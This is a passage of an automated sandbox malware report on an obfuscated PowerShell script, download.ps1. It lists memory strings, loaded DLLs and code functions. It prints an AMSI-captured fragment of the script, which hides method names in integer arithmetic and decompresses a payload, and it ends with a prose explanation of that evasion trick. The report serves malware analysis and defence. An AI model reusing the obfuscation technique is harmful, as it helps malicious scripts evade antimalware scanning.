Source: powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFD9B7A8126
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFD9B7A8ED2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFD9B79208D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFD9B7A0EFA
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBCCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ3LGyg2IsbEukvOODILlOU0K_Xf7S6S3" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="QRSgWh_fnsVpcixOprXVSA">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br><div id="K7FuCf"><style>.U8K5Lc{font-size:small;margin-bottom:32px}.U8K5Lc a.qDTOof{display:inline-block;text-decoration:none}.U8K5Lc img{border:none;margin-right:5px;vertical-align:middle}</style><div class="U8K5Lc" data-ved="0ahUKEwjWuPCZ5M-KAxW3RPEDHbFnCoMQnIcBCAU"><a href="https://www.google.com/url?q=https://www.google.com/search%3Fq%3DPresident%2BJimmy%2BCarter%26source%3Dsmp.2023carterhpp.2%26stick%3DH4sIAAAAAAAA_zu04eRyNhYpJgGGW-cOnOVk4mAAAAs3vRsSAAAA&amp;source=hpp&amp;id=19046191&amp;ct=3&amp;usg=AOvVaw1DdLddPyaDlZCddFvNE2w3&amp;sa=X&amp;ved=0ahUKEwjWuPCZ5M-KAxW3RPEDHbFnCoMQ8IcBCAY" rel="nofollow">President Jimmy Carter, 1924 - 2024</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="QRSgWh_fnsVpcixOprXVSA">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="QRSgWh_fnsVpcixOprXVSA">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIAB
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4wX
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w'
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: var e=this||self;var g,h;a:{for(var k=["CLOSURE_FLAGS"],l=e,n=0;n<k.length;n++)if(l=l[k[n]],l==null){h=null;break a}h=l}var p=h&&h[610401301];g=p!=null?p:!1;var q,r=e.navigator;q=r?r.userAgentData||null:null;function t(a){return g?q?q.brands.some(function(c){return(c=c.brand)&&c.indexOf(a)!=-1}):!1:!1}function u(a){var c;a:{if(c=e.navigator)if(c=c.userAgent)break a;c=""}return c.indexOf(a)!=-1};function v(){return g?!!q&&q.brands.length>0:!1}function w(){return u("Safari")&&!(x()||(v()?0:u("Coast"))||(v()?0:u("Opera"))||(v()?0:u("Edge"))||(v()?t("Microsoft Edge"):u("Edg/"))||(v()?t("Opera"):u("OPR"))||u("Firefox")||u("FxiOS")||u("Silk")||u("Android"))}function x(){return v()?t("Chromium"):(u("Chrome")||u("CriOS"))&&!(v()?0:u("Edge"))||u("Silk")}function y(){return u("Android")&&!(x()||AAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="QRSgWh_fnsVpcixOprXVSA">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=gbtcb></span><ol class=gbtc><li class=gbt><a target=_top href="https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAAQ" onclick="gbar.logger.il(9,{l:'i'})" id=gb_70 class=gbgt><span class=gbtb2></span><span id=gbgs4 class=gbts><span id=gbi4s1>Sign in</span></span></a></li><li class="gbt gbtb"><span class=gbts></span></li><li class=gbt><a class=gbgt id=gbg5 href="http://www.google.com/preferences?hl=en" title="Options" aria-haspopup=true aria-owns=gbd5><span class=gbtb2></span><span id=gbgs5 class=gbts><span id=gbi5></span></span></a><script nonce='QRSgWh_fnsVpcixOprXVSA'>document.getElementById('gbg5').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd5 aria-owner=gbg5><div class=gbmc><ol id=gbom class=gbmcc><li class="gbkc gbmtc"><a class=gbmt href="/preferences?hl=en">Search settings</a></li><li class=gbmtc><div class="gbmt gbmh"></div></li><li class="gbkp gbmtc"><a class=gbmt href="http://www.google.com/history/optout?hl=en">Web History</a></li></ol></div></div></li></ol></div></div><div id=gbx3></div><div id=gbx4></div><script nonce='QRSgWh_fnsVpcixOprXVSA'>window.gbar&&gbar.elp&&gbar.elp()</script></div></div><center><br clear="all" id="lgpd"><div id="XjhHGf"><img alt="Google" height="92" src="/images/branding
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: "",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="QRSgWh_fnsVpcixOprXVSA">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="QRSgWh_fnsVpcixOprXVSA">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: classification engine | Classification label: mal68.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lrasqh4.is5.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $vws3l6gj5oybp1t.(([system.String]::new(@((3501-(4859110/1415)),(-7147+(6212+1046)),(332864/2972),(352715/(8422-(-1154+6661))),(-3618+(32659044/8822)),(-3992+(-3127+7230))))))( $lmwog3a4byc7z5d ) $vws3l6gj5oybp1t.(([system.String]::new(@((412117/6151),(4341-4233),(149184/1344),(-426+541),(941421/9321)))))()$gjpcd91vshno372.(([char[]]@((654657/9771),(-9956+(99804688/9917)),(305694/(9256-6502)),(705985/(2527+(11991840/3320))),(-8435+(306+8230))) -join ''))()[byte[]] $qk5tjuw9ngo0xf1 = $lmwog3a4byc7z5d.(([system.String]::new(@((838656/9984),(8216-(4887315/(4612950/(105+(11294-(13784-10035)))))),(-239+(324976/1069)),(-6170+6284),(1025544/(9908-(-505+1417))),(800153/(14695-6446)),(582978/(9270-4452))))))() $2kz9pblfo8ruq1d=$qk5tjuw9ngo0xf1 return $2kz9pblfo8ruq1d}[System.Text.Encoding]::ascii.(([system.String]::new(@((8987-8916),(-5126+(5796743/1109)),(-9947+(17989-(23262810/(11120-8185)))),(215800/(10283000/3955)),(7513-(1791+5606)),(-8929+(22191522/2454)),(-3550+3655),(-3921+(5973-1942)),(-7694+(4389711/(-6151+6714)))))))((guzwyhi85ros4cblt9jmdxpq7n2 "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1718205013.00000287D9A94000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb6 source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb?W source: powershell.exe, 00000000.00000002.1777765113.00000287F3F0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1776433266.00000287F3D90000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1779315827.00000287F4190000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1718205013.00000287D9A94000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gement.Automation.pdbdb\ source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbx source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbf source: powershell.exe, 00000000.00000002.1776433266.00000287F3D90000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B67D2A5 pushad ; iretd 0_2_00007FFD9B67D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B7A0394 push cs; ret 0_2_00007FFD9B7A03D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B7A030D push cs; ret 0_2_00007FFD9B7A03D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B7A02BD push cs; ret 0_2_00007FFD9B7A03D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B790952 push E95B6FD0h; ret 0_2_00007FFD9B7909C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B7900BD pushad ; iretd 0_2_00007FFD9B7900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B794FAB push ecx; ret 0_2_00007FFD9B794FAC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B861920 push eax; ret 0_2_00007FFD9B861921
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BA46E14 push es; iretd 0_2_00007FFD9BA46E17
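The Anti Malware Scan Interface entry earlier in this section shows how download.ps1 hides the .NET members it calls: each name is assembled at run time from an array of integer arithmetic, wrapped either as [system.String]::new(@(...)) or as ([char[]]@(...) -join ''), so strings such as CopyTo never appear on disk and AMSI only sees them once the script is already running. Evaluating the five arrays in that fragment yields CopyTo, Close, Close, ToArray and GetString: the code copies a System.IO.Compression decompression stream into a byte array and decodes the result as ASCII text, with the GetString argument cut off where the report truncates the buffer. The Python below is an added example for this report, not Joe Sandbox code and not part of the sample; it decodes the arithmetic with a restricted AST walker so that nothing is ever handed to powershell.exe, and it rewrites the captured fragment into readable form. AMSI_FRAGMENT is the report's own AMSI entry with the Source column removed; the helper names and the assumption that the 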